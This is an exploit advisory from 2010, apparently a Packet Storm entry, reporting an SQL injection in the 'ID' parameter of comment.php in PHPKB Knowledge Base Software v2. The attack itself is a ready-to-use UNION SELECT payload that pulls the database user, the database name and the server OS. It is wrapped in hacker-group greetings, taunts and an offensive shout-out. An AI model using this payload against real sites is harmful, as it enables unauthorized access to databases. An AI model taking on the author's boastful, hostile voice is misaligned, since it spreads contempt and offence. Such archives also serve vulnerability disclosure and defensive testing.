PHPKB Knowledge Base Software 2 SQL Injection

2010-05-10T00:00:00
ID PACKETSTORM:89346
Type packetstorm
Reporter R3d-D3v!L
Modified 2010-05-10T00:00:00

Description

                                        
                                            `  
  
  
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????   
[?]   
[~]Tybe:PHPKB Knowledge Base Software v2 Multilanguage Support(comment.php ID)suffer from Sql Injection Vulnerability  
[~]  
  
[~] Vendor: www.knowledgebase-script.com  
[?] Software: PHPKB Knowledge Base Software v2 Multilanguage Support  
[-]   
[?] author: ((R3d-D3v!L))  
[?] TEAM: ArA8!4N iNFORM47!ON S3cuR!7Y --->((A.i.S))  
[?] contact:X@hotmail.co.jp  
[-]   
[?] Date: 10.may.2010  
[?] T!ME: 5:00  
[?] Home: not found  
[?]   
[?]   
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????   
  
  
  
  
  
  
  
  
  
  
  
[*] Err0r C0N50L3:   
  
  
http://127.0.0.1/comment.php?ID=EV!L EXPLO!T  
  
  
  
[*]{EV!L EXPLO!T}  
  
-1+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*  
  
  
  
  
N073:   
  
REAL RED DEV!L W@S h3r3 LAMERZ   
  
  
GAZA !N our hearts !  
  
  
  
  
  
[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------#  
#  
[~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #   
#  
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #  
#  
[~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) #  
#  
[?]spechial SupP0RT : MY M!ND # © Offensive Security #  
#  
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) #  
#  
[~]spechial FR!ND: 0r45hy #  
#  
[~] !'M 4R48!4N 3XPL0!73R. #  
#  
[~]{[(D!R 4ll 0R D!E)]}; #  
#  
[~]--------------------------------------------------------------------------------------------- #   
_________________________________________________________________  
Hotmail: Free, trusted and rich email service.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`